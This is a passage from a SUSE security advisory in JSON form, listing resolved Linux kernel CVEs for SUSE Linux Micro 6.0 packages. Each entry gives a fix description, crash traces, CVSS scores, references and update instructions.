"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68801"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
